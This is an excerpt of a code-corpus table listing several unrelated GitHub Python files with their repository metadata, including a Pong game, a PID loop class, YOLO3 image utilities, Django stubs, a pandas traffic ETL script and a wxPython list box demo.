blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0d468ab5f005dc9434a16e44bdaa293e820314a5 | 59b3acec6c6a021528682573e478ced2794c6b03 | /Scripting_tutes_labs/Python Assignment/A2/Part A/WORKS.py | d7b1429acd24e86cd27457f2d7bd0b98d17e34d4 | [] | no_license | charlesluch/Code | f9ed52e5cfb45917baf35277cdf8da68e54332ea | a9d772d73ab40bd01266d7d833dbeab95797bf44 | refs/heads/master | 2021-10-09T01:41:48.815186 | 2018-12-20T02:59:15 | 2018-12-20T02:59:15 | 131,547,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,694 | py | #! usr/bin/env python3
# running from JSONDecodeError: Extra data, Attribute error, Expecting double quotes...
# we need services as a dictionary and flows as an array...
with open(realConfig, 'r') as c:
data = c.read().replace('\n','')
jConfig = json.dumps('"{}"'.format(data))
print(jConfig)
# we were just printing the string with wierd added \ characters...
with open(realConfig, 'r') as c:
data = c.read().replace('\n','')
print(data)
# .json is now valid, turns out it was an encoding problem, we needed also to use json.load
with io.open(realConfig, 'r', encoding='utf8') as c:
plan = json.load(c)
print(c)
print(plan)
# we can now call by key as follows:
print(plan['flows']['Append at morning'])
# read the contents of the .json configuration file and let that file dictate the actions of the program.
for flow in plan['flows']:
print("\nFlow is:", flow)
for service in plan['flows'][flow]:
print("\tcalling service:", service)
# open the service and run the external program
programFile = plan['services'][service]['program']
print(programFile)
p = run(programFile, stdout=PIPE, input='', encoding='utf-8', shell='true') # Thanks Amy Dempster, shell='true'
print(p.returncode)
print(p.stdout)
# print statements for testing
# Morning
# print(arg.start,start)
# if not args.start:
# start = "00:00:00"
# else:
# start = args.start
#
# if not args.end:
# end = "11:59:59"
# else:
# end = args.end
#
# now = sys.stdin.read()
#
| [
"[email protected]"
] | |
71bd675ad4473f0c69d41c815af1baea3a5524f6 | 1427d0409ea9d0b578890d9e8e01fd5d1df70bf4 | /components/loop.py | e80ff4d8272f2ee0de86f220c36beec9d7df1f35 | [
"MIT"
] | permissive | mradrianhh/PID-265DS | 2e3a1097928a16bf31c6b8c2fdcb82c454c3efbd | 963d2f3ce1402cf1600e21ed4e9bc2054dc39024 | refs/heads/main | 2023-08-06T11:03:19.120774 | 2021-10-04T22:17:27 | 2021-10-04T22:17:27 | 411,594,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,878 | py | from .actuator import Actuator
from .sensor import Sensor
class Loop(object):
__tag: str
__actuators: "dict[str, Actuator]"
__sensors: "dict[str, Sensor]"
__target_value: float = 0.0
__actual_value: float = 0.0
__error: float # target_value - actual_value
__proportional_proportionality_factor: float
__integral_proportionality_factor: float
__differential_proportionality_factor: float
def __init__(self, tag: str, actuators: "dict[str, Actuator]" = [], sensors: "dict[str, Sensor]" = [], proportional_proportionality_factor: float = 0.0, integral_proportionality_factor: float = 0.0, differential_proportionality_factor: float = 0.0):
self.__actuators = actuators
self.__sensors = sensors
self.__tag = tag
self.__proportional_proportionality_factor = proportional_proportionality_factor
self.__integral_proportionality_factor = integral_proportionality_factor
self.__differential_proportionality_factor = differential_proportionality_factor
def calculate_error(self):
self.__error = self.__target_value - self.__actual_value
def calculate_proportional(self) -> float:
return self.__error * self.__proportional_proportionality_factor
def print_information(self):
print(self.__tag)
print(f'Target value : {self.__target_value}')
print(f'Actual value: {self.__actual_value}')
print("Actuators:")
for key in self.__actuators.keys():
print(f'\t{key} : {self.__actuators[key].get_desc()}')
print("Sensors:")
for key in self.__sensors.keys():
print(f'\t{key} : {self.__sensors[key].get_desc()}')
def add_actuator(self, actuator: Actuator):
self.__actuators[actuator.get_tag()] = actuator
def add_sensor(self, sensor: Sensor):
self.__sensors[sensor.get_tag()] = sensor
def get_target_value(self) -> float:
return self.__target_value
def set_target_value(self, target_value: float):
self.__target_value = target_value
def get_actual_value(self) -> float:
return self.__actual_value
def set_actual_value(self, actual_value: float):
self.__actual_value = actual_value
def get_actuators(self) -> "dict[str, Actuator]":
return self.__actuators
def get_actuator(self, key) -> Actuator:
return self.__actuators[key]
def get_sensors(self) -> "dict[str, Sensor]":
return self.__sensors
def get_sensor(self, key) -> Sensor:
return self.__sensors[key]
def get_proportional_proportionality_factor(self) -> float:
return self.__proportional_proportionality_factor
def set_proportional_proportionality_factor(self, proportional_proportionality_factor: float):
self.__proportional_proportionality_factor = proportional_proportionality_factor
def get_integral_proportionality_factor(self) -> float:
return self.__integral_proportionality_factor
def set_integral_proportionality_factor(self, integral_proportionality_factor: float):
self.__integral_proportionality_factor = integral_proportionality_factor
def get_differential_proportionality_factor(self) -> float:
return self.__differential_proportionality_factor
def set_differential_proportionality_factor(self, differential_proportionality_factor: float):
self.__differential_proportionality_factor = differential_proportionality_factor
def get_error(self) -> float:
return self.__error
def set_error(self, error: float):
self.__error = error
| [
"[email protected]"
] | |
a908e07377adf924eff8803c3ecc541a1bbb1fb3 | c4ba4ac1c54dd31ac0dd2da9881a76adba2b8640 | /game1.py | 7ebe69909e16a6546b602919bb9b8207b8217ce9 | [] | no_license | sirishavemavarapu1/MyProject1 | 1dd2f76c672d92e1e81f6426691eef4883ed956e | 8aa263e467a88b65d5bee247e4f1eb841c9b02d3 | refs/heads/master | 2023-06-20T12:52:26.176798 | 2021-07-16T05:15:42 | 2021-07-16T05:15:42 | 386,189,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,468 | py | import turtle
import random
wn=turtle.Screen()
wn.title("First game")
wn.bgcolor("blue")
wn.setup(width=800,height=600)
#wn.tracer(0)
# tracer stops the window to update
score_a=0
score_b=0
#paddle A
paddle_a=turtle.Turtle()
paddle_a.speed(0)
paddle_a.shape("square")
paddle_a.color("white")
paddle_a.shapesize(stretch_wid=5,stretch_len=1)
paddle_a.penup()
paddle_a.goto(-350,0)
#paddle
paddle_b=turtle.Turtle()
paddle_b.speed(0)
paddle_b.shape("square")
paddle_b.color("white")
paddle_b.shapesize(stretch_wid=5,stretch_len=1)
paddle_b.penup()
paddle_b.goto(350,0)
#Ball
ball=turtle.Turtle()
ball.speed(3)
ball.shape("square")
ball.color("grey")
ball.penup()
ball.dx=random.randint(0,2)
ball.dy=random.randint(0,2)
#Pen
pen=turtle.Turtle()
pen.speed(0)
pen.color("white")
pen.penup()
pen.hideturtle()
pen.goto(0,260)
pen.write("Player A :0 Player B:0" ,align="center",font=30 )
#Function
def paddle_a_up():
y=paddle_a.ycor()
y+=10
paddle_a.sety(y)
#KEYBOARD BINDING
wn.listen()
wn.onkeypress(paddle_a_up,"Up")
def paddle_a_down():
y=paddle_a.ycor()
y-=10
paddle_a.sety(y)
#KEYBOARD BINDING
wn.listen()
wn.onkeypress(paddle_a_down,"Down")
def paddle_b_up():
y=paddle_b.ycor()
y+=10
paddle_b.sety(y)
wn.listen()
wn.onkeypress(paddle_b_up,"a")
def paddle_b_down():
y=paddle_b.ycor()
y-=10
paddle_b.sety(y)
wn.listen()
wn.onkeypress(paddle_b_down,"z")
while True:
wn.update()
# Ball move
ball.setx(ball.xcor()+ball.dx)
ball.sety(ball.ycor()+ball.dy)
#Border check
if ball.ycor()>290:
ball.sety(290)
ball.dy *=-1
if ball.ycor()<-290:
ball.sety(-290)
ball.dy *=-1
if ball.xcor()>390:
ball.goto(0,0)
ball.dx *=-1
score_a +=1
pen.clear()
pen.write("Player A :{} Player B:{}".format(score_a,score_b),align="center",font=30 )
if ball.xcor()<-390:
ball.goto(0,0)
ball.dx *=-1
score_b +=1
pen.clear()
pen.write("Player A :{} Player B:{}".format(score_a,score_b),align="center",font=30 )
if ball.xcor()>340 and ball.xcor()<350 and (ball.ycor()<paddle_b.ycor()+40 and ball.ycor()>paddle_b.ycor()-40):
ball.setx(340)
ball.dx*=-1
if ball.xcor()<-340 and ball.xcor()>-350 and (ball.ycor()<paddle_a.ycor()+40 and ball.ycor()>paddle_a.ycor()-40):
ball.setx(-340)
ball.dx*=-1
| [
"[email protected]"
] | |
725a87acfa6b9893392924065b343ae9ea341df9 | 7bf9b2aaed98c2b7c86b95c90f313983b0691fe9 | /pythonlib/amlrealtimeai/external/tensorflow/core/framework/iterator_pb2.py | aedc327b8d2350119283be7844be0d28138a1fa4 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | Azure/aml-real-time-ai | c6b46fd8c7f368324344cf375aae59b213842cfc | 7c034be63119a59e91671d4ae401e041d8240751 | refs/heads/master | 2023-06-10T09:28:07.276953 | 2023-05-31T18:48:21 | 2023-05-31T18:48:21 | 131,752,395 | 151 | 47 | MIT | 2023-05-31T18:48:23 | 2018-05-01T19:08:55 | C# | UTF-8 | Python | false | true | 2,736 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorflow/core/framework/iterator.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow/core/framework/iterator.proto',
package='tensorflow',
syntax='proto3',
serialized_pb=_b('\n(tensorflow/core/framework/iterator.proto\x12\ntensorflow\"6\n\x15IteratorStateMetadata\x12\x0f\n\x07version\x18\x01 \x01(\t\x12\x0c\n\x04keys\x18\x02 \x03(\tB*\n\x13org.tensorflow.utilB\x0eIteratorProtosP\x01\xf8\x01\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ITERATORSTATEMETADATA = _descriptor.Descriptor(
name='IteratorStateMetadata',
full_name='tensorflow.IteratorStateMetadata',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='version', full_name='tensorflow.IteratorStateMetadata.version', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='keys', full_name='tensorflow.IteratorStateMetadata.keys', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=56,
serialized_end=110,
)
DESCRIPTOR.message_types_by_name['IteratorStateMetadata'] = _ITERATORSTATEMETADATA
IteratorStateMetadata = _reflection.GeneratedProtocolMessageType('IteratorStateMetadata', (_message.Message,), dict(
DESCRIPTOR = _ITERATORSTATEMETADATA,
__module__ = 'tensorflow.core.framework.iterator_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.IteratorStateMetadata)
))
_sym_db.RegisterMessage(IteratorStateMetadata)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023org.tensorflow.utilB\016IteratorProtosP\001\370\001\001'))
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
70186ad60d9b16a7751a346403b63c9323ac7cc7 | 00c1246152ab64a7fff54f5937111da7b183a341 | /yolo3/utils.py | 860e1e45bae011ff2938a89ef9594c1ae49b1aee | [] | no_license | alejandrobalderas/ObjectDetectionJetsonNano | 80cfc4cbf67e6b2839eab15b58af262846415c07 | d42d5ac082af2da38cce9e3cc7206e16868c1042 | refs/heads/master | 2022-11-27T15:36:34.442663 | 2020-03-30T09:33:15 | 2020-03-30T09:33:15 | 251,260,189 | 0 | 0 | null | 2022-11-22T02:42:23 | 2020-03-30T09:32:58 | Python | UTF-8 | Python | false | false | 4,210 | py | """Miscellaneous utility functions."""
import matplotlib.pyplot as plt
from functools import reduce
from PIL import Image
import numpy as np
from matplotlib.colors import rgb_to_hsv, hsv_to_rgb
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.')
def letterbox_image(image, size):
'''resize image with unchanged aspect ratio using padding'''
iw, ih = image.size
w, h = size
scale = min(w/iw, h/ih)
nw = int(iw*scale)
nh = int(ih*scale)
image = image.resize((nw, nh), Image.BICUBIC)
new_image = Image.new('RGB', size, (128, 128, 128))
new_image.paste(image, ((w-nw)//2, (h-nh)//2))
return new_image
def rand(a=0, b=1):
return np.random.rand()*(b-a) + a
def get_random_data(annotation_line, input_shape, random=True, max_boxes=20, scale_min=0.5, scale_max=1.5, jitter=.3, hue=.1, sat=1.5, val=1.5, flip_image=True, proc_img=True):
'''random preprocessing for real-time data augmentation'''
line = annotation_line.split()
image = Image.open(line[0])
iw, ih = image.size
h, w = input_shape
box = np.array([np.array(list(map(int, box.split(','))))
for box in line[1:]])
if not random:
# resize image
scale = min(w/iw, h/ih)
nw = int(iw*scale)
nh = int(ih*scale)
dx = (w-nw)//2
dy = (h-nh)//2
image_data = 0
if proc_img:
image = image.resize((nw, nh), Image.BICUBIC)
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image_data = np.array(new_image)/255.
# correct boxes
box_data = np.zeros((max_boxes, 5))
if len(box) > 0:
np.random.shuffle(box)
if len(box) > max_boxes:
box = box[:max_boxes]
box[:, [0, 2]] = box[:, [0, 2]]*scale + dx
box[:, [1, 3]] = box[:, [1, 3]]*scale + dy
box_data[:len(box)] = box
return image_data, box_data
# =========== If random=True then this part will be executed ============
# resize image
new_ar = w/h * rand(1-jitter, 1+jitter)/rand(1-jitter, 1+jitter)
scale = rand(scale_min, scale_max)
if new_ar < 1:
nh = int(scale*h)
nw = int(nh*new_ar)
else:
nw = int(scale*w)
nh = int(nw/new_ar)
image = image.resize((nw, nh), Image.BICUBIC)
# place image
dx = int(rand(0, w-nw))
dy = int(rand(0, h-nh))
new_image = Image.new('RGB', (w, h), (128, 128, 128))
new_image.paste(image, (dx, dy))
image = new_image
# flip image or not
if flip_image:
flip = rand() < .5
if flip:
image = image.transpose(Image.FLIP_LEFT_RIGHT)
else:
flip = False
# distort image
hue = rand(-hue, hue)
sat = rand(1, sat) if rand() < .5 else 1/rand(1, sat)
val = rand(1, val) if rand() < .5 else 1/rand(1, val)
x = rgb_to_hsv(np.array(image)/255.)
x[..., 0] += hue
x[..., 0][x[..., 0] > 1] -= 1
x[..., 0][x[..., 0] < 0] += 1
x[..., 1] *= sat
x[..., 2] *= val
x[x > 1] = 1
x[x < 0] = 0
image_data = hsv_to_rgb(x) # numpy array, 0 to 1
# correct boxes
box_data = np.zeros((max_boxes, 5))
if len(box) > 0:
np.random.shuffle(box)
box[:, [0, 2]] = box[:, [0, 2]]*nw/iw + dx
box[:, [1, 3]] = box[:, [1, 3]]*nh/ih + dy
if flip:
box[:, [0, 2]] = w - box[:, [2, 0]]
box[:, 0:2][box[:, 0:2] < 0] = 0
box[:, 2][box[:, 2] > w] = w
box[:, 3][box[:, 3] > h] = h
box_w = box[:, 2] - box[:, 0]
box_h = box[:, 3] - box[:, 1]
box = box[np.logical_and(box_w > 1, box_h > 1)] # discard invalid box
if len(box) > max_boxes:
box = box[:max_boxes]
box_data[:len(box)] = box
return image_data, box_data
| [
"[email protected]"
] | |
e20ffc086d056723ee99ecdb3a25ac016a38eee8 | bfda406cd58709f7ac633802203d133f87bab0a6 | /xmlparse.py | 26f9c83c38f6cb44b0f246084a3211984bd3e817 | [] | no_license | AkshayAgrawal1997/Floor-Plan | 8e3b2dcdee8e333fbe65d335b5ce45afeea0ef52 | 33df7f2b7fd033dcbee4d17c1e60b2973bd50c71 | refs/heads/master | 2021-09-24T03:40:27.405770 | 2018-10-02T20:28:36 | 2018-10-02T20:28:36 | 112,031,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | import xml.etree.ElementTree as ET
tree = ET.parse('sample.xml')
root = tree.getroot()
print root[1][3].text
print len(root[1]) | [
"[email protected]"
] | |
b3c86a9f339858c77e142a9a3e97aa7df42aaa98 | 8860be2d991b21c4f25f3470750cad840138b080 | /remvBlank.py | 2c6f110bb6dc03f002c9d742a057c80cad602aee | [] | no_license | neeschal00/pythonscript | 791f2528ebadcf6b71dc537047794b3640b90b5d | 69fb2b7e93ea793688c76ca8e04da694961f10ba | refs/heads/main | 2023-01-11T17:49:11.721389 | 2022-12-29T14:08:01 | 2022-12-29T14:08:01 | 218,926,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py | # import pandas as pd
import os
import csv
import time
import sys
dir_path = sys.argv[1]
dir_file = os.getcwd()
'''
for files in os.listdir(dir_file):
# print(files)
if(files.endswith(".csv")):
df = pd.read_csv(files)
output_file = files.split(".csv")
output_file = output_file[0]+"1"+".csv"
df.to_csv(output_file,index=False)
os.remove(files)
os.rename(output_file,files)
'''
for files in os.listdir(dir_file):
# print(files)
if(files.endswith(".csv")):
with open(files, newline='') as in_file:
out_fileN = files.split(".csv")
out_fileN = out_fileN[0]+"1"+".csv"
with open(out_fileN, 'w', newline='') as out_file:
writer = csv.writer(out_file)
for row in csv.reader(in_file):
if row:
writer.writerow(row)
time.sleep(3)
os.remove(files)
os.rename(out_fileN,files)
files = ''
out_fileN = '' | [
"[email protected]"
] | |
447c19a5107b03a7d4b4af3821ff647e0c6877bf | 296fdc87527328f428f4a500a18cdba4e8051d1a | /ETL_Project_Traffic_Data.py | 7e8571f699a9c748390bbb7947cd86a54cacc4e7 | [] | no_license | jimknopp2/jimknopp2.github.io | 9da0a60624d282924e8fb6a59df1af8f1fbcc1d9 | 7319eb74dcc27c5821f7ad5a9c69bdc906717b9c | refs/heads/master | 2022-11-30T15:58:17.243551 | 2020-08-04T00:48:05 | 2020-08-04T00:48:05 | 280,679,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,278 | py | #!/usr/bin/env python
# coding: utf-8
# In[19]:
import pandas as pd
# In[20]:
may2020_path = r"C:\Users\jimkn\Desktop\Trips_by_Distance_May_2020.csv"
May_2020_Travel = pd.read_csv(may2020_path)
May_2020_Travel = May_2020_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
May_2020_Travel.head()
# In[21]:
may2019_path = r"C:\Users\jimkn\Desktop\Trips_by_Distance_May_2019.csv"
May_2019_Travel = pd.read_csv(may2019_path)
May_2019_Travel = May_2019_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
May_2019_Travel.head()
# In[22]:
June2020_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (4).csv"
June_2020_Travel = pd.read_csv(June2020_path)
June_2020_Travel = June_2020_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
June_2020_Travel.head()
# In[23]:
April2020_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (6).csv"
April_2020_Travel = pd.read_csv(April2020_path)
April_2020_Travel = April_2020_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
April_2020_Travel.head()
# In[24]:
April2019_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (7).csv"
April_2019_Travel = pd.read_csv(April2019_path)
April_2019_Travel = April_2019_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
April_2019_Travel.head()
# In[25]:
June2019_path = r"C:\Users\jimkn\Downloads\Trips_by_Distance (8).csv"
June_2019_Travel = pd.read_csv(June2019_path)
June_2019_Travel = June_2019_Travel.drop(["State FIPS", "County FIPS", "Population Staying at Home", "Population Not Staying at Home"], axis=1)
June_2019_Travel.head()
# In[37]:
last_year_frames = [April_2019_Travel, May_2019_Travel, June_2019_Travel]
last_year_traffic = pd.concat(last_year_frames)
lytraffic = last_year_traffic.drop([88], axis=0)
lytraffic
# In[38]:
current_year_traffic = [April_2020_Travel, May_2020_Travel, June_2020_Travel]
current_year_traffic = pd.concat(last_year_frames)
cytraffic = last_year_traffic.drop([88], axis=0)
cytraffic
# In[ ]:
| [
"[email protected]"
] | |
deae2c718014d5c62b18f3b9e662a51d775816b0 | 016af41dca1629ed042005066c7f0dfc0f5690ee | /LcvSeach/wsgi.py | c17746d92d5e4968a52e851804e66ba10b10a1e6 | [] | no_license | Coder-Chandler/SearchEngine | 5b193594f155165a498efe59a01288e8c46aba50 | 88308442147b22c67329b7de6b4835cf56da2cfa | refs/heads/master | 2020-12-07T13:33:15.910860 | 2017-10-25T17:55:34 | 2017-10-25T17:55:34 | 95,567,710 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | """
WSGI config for LcvSeach project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "LcvSeach.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
329b21243aab082238f73114c3a49a0339ffa20e | 7e59030ba3cb4461b95102c443e0d7803ec4b03a | /templates/skeleton.py | 4630d3741cbcc9f45d0231da256711c3f39bce4d | [] | no_license | vsmayberry/.vim | 3ce65ccd87e619ceb6136589a2aaf7b3b3be1e70 | 4fd3798fbea36beab791a6bc976831e49aa33c31 | refs/heads/master | 2021-01-18T15:04:12.926365 | 2018-08-25T03:13:59 | 2018-08-25T03:13:59 | 15,790,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | #!/usr/bin/env python3
#author Virgil Mayberry
#Created taimilolotonga
| [
"[email protected]"
] | |
41c3785835279daff1c3c4c7f5c68c4bdd5231fd | 5d21c218fbc95bfd9be45f8ca87d3b052820208a | /bin/django-admin.py | 3cade6c78c2f734b4e0106e01a1c37c2e5988cca | [] | no_license | the-breanne/S2-backend | 10bda0c1776a4a56e7888659544279ed962814af | 9fb3ea6cca16b1c999b235ba26c1749cebca3ece | refs/heads/master | 2023-09-05T08:56:03.484042 | 2021-11-20T02:07:33 | 2021-11-20T02:07:33 | 429,977,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | #!/Users/breanne/vue_env/bin/python3.8
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"[email protected]"
] | |
7a6075aacbec7cc6a15f3906fd25a51906a263ab | 038c73ff79d5276f327b717ae718ca3168eca920 | /Adaptive_Python/lesson1/task5/task.py | 137472f3ef79b9ac32f812b0a7fb62d62b68ec18 | [] | no_license | noahholley/python_problems | 9b7fa63fdda328ac7ef779caafc9c5bf6eb8aac3 | 0dcd88e46d37f69e83ded8d9f641fe77747cff4a | refs/heads/master | 2021-07-05T12:25:52.139669 | 2017-09-26T21:50:51 | 2017-09-26T21:50:51 | 104,807,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """Transform the symbol into uppercase.
Input data
A single symbol.
Output data
If the entered symbol is a lowercase letter of the Latin alphabet, output the same uppercase letter. Otherwise, output the symbol that was entered.
Sample Input:
b
Sample Output:
B
Memory limit: 256 Mb
Time limit: 1s"""
data = input()
if data.isupper():
print(data)
else:
print(data.upper())
| [
"[email protected]"
] | |
2d27e1435dbaa00e56a153b88d9dae978c026ef7 | 6c1c5ebe4c27663030745cf1b7a6d520bb1e6837 | /api/models.py | e4b65ac632566e0b3ab62bdaba5ec6ae899e4fe9 | [] | no_license | bryanmarthin/django-wishlist | 7160a0cbd9078b2a1e41f4ab07a20726d1ea4069 | f7a9d05428170d6d4447347a793ae6973a3b25f6 | refs/heads/master | 2020-04-09T18:35:20.885703 | 2015-09-12T14:18:49 | 2015-09-12T14:18:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from django.db import models
class Post(models.Model):
class Meta:
db_table = 'Post'
user = models.CharField(max_length=20)
created_at = models.DateTimeField(auto_now_add=True)
text = models.CharField(max_length=255) | [
"[email protected]"
] | |
548f33186530791f420e12f279eb3364fff4fcb4 | 1777b71c9c89962f379b8d78e8d459073c78c9ad | /simple_smartsheet/models/__init__.py | bc1b7ccb72f238acbeeefb00f5b0f7f176a51a41 | [
"MIT"
] | permissive | dmfigol/simple-smartsheet | b7ff2c308715905f04784dee185a77944d20c2fa | 0b1010d850dcde4a2f85360932357f7691917936 | refs/heads/master | 2023-01-10T06:28:47.553873 | 2020-02-06T18:44:44 | 2020-02-06T18:44:44 | 151,758,014 | 23 | 10 | MIT | 2023-01-05T17:25:52 | 2018-10-05T17:48:43 | Python | UTF-8 | Python | false | false | 233 | py | from .cell import Cell
from .column import Column, ColumnType
from .sheet import Sheet # sheet must be before row
from .row import Row
from .report import Report
__all__ = ("Cell", "Column", "ColumnType", "Row", "Sheet", "Report")
| [
"[email protected]"
] | |
b5d8f3348648bca0c54f117af3228da951fb8758 | dfab6798ece135946aebb08f93f162c37dd51791 | /core/luban/ui/validators.py | 31b61b12375a243e0938e106ef4399a516d929a0 | [] | no_license | yxqd/luban | 405f5f7dcf09015d214079fe7e23d644332be069 | 00f699d15c572c8bf160516d582fa37f84ac2023 | refs/heads/master | 2020-03-20T23:08:45.153471 | 2012-05-18T14:52:43 | 2012-05-18T14:52:43 | 137,831,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | # -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
"""
validators are used to decorate descriptors. for example::
>>> descriptor.validator = validators.choice([1,2])
>>> descriptor.validator = validators.notnull
"""
def choice(items):
def _(v):
if v in items: return
m = "%s not in %s" % (v, items)
raise ValueError(m)
return _
# version
__id__ = "$Id$"
# End of file
| [
"[email protected]"
] | |
2800d80fee09d926e89785da682ec6f1ce2dcc75 | ad8566dace0e4ab4b419b1bb5bc055b095adce72 | /ics/migrations/0060_goal_rank.py | adc9e668bd368dc757f119d3d7750b5a752f5cdb | [] | no_license | mayanb/wafflecone | 6c844c4c908f7c9b8e41d0d42faeefbfa8b9573e | fcd45a3b745232e52af3bdffa3fab25f13c7464d | refs/heads/staging | 2022-12-14T03:34:14.618001 | 2018-09-26T21:35:52 | 2018-09-26T21:35:52 | 74,408,398 | 1 | 0 | null | 2022-12-08T00:46:05 | 2016-11-21T21:40:59 | Python | UTF-8 | Python | false | false | 487 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-11-27 22:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ics', '0059_account_contact_inventoryunit_order_orderinventoryunit'),
]
operations = [
migrations.AddField(
model_name='goal',
name='rank',
field=models.PositiveSmallIntegerField(default=0),
),
]
| [
"[email protected]"
] | |
17b4f6c8cce0c08486364ca7eb83ca1335cd18d2 | 1a3ba2a78670817c59965a1bc35c98718b0b5e44 | /baseCtrlElements/listBoxes.py | 5e3b2db9812507d9c28a85be7ac72f0acd4aed50 | [] | no_license | yulits/MywxPythonDemo | 01fc24f3e9bd95c19dad6c84cd2b2ff389d9e854 | 4f59e1fedca6615b4c893f575edbad73fafc8d91 | refs/heads/master | 2020-04-03T01:29:55.504279 | 2016-07-09T07:41:59 | 2016-07-09T07:41:59 | 59,916,853 | 0 | 0 | null | 2016-07-09T07:42:00 | 2016-05-28T22:24:23 | Python | UTF-8 | Python | false | false | 764 | py | import wx
class ListBoxFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self, None, -1, 'List Box Example',
size=(250, 200))
panel = wx.Panel(self, -1)
sampleList = ['zero', 'one', 'two', 'three', 'four', 'five',
'six', 'seven', 'eight', 'nine', 'ten', 'eleven',
'twelve', 'thirteen', 'fourteen']
listBox = wx.ListBox(panel, -1, (20, 20), (80, 120),
sampleList, wx.LB_MULTIPLE)
listBox.SetSelection(3)
listBox = wx.CheckListBox(panel, -1, (120, 20), (80, 120),
sampleList, wx.LB_SINGLE)
listBox.SetSelection(1)
if __name__ == '__main__':
app = wx.App()
ListBoxFrame().Show()
app.MainLoop()
| [
"[email protected]"
] | |
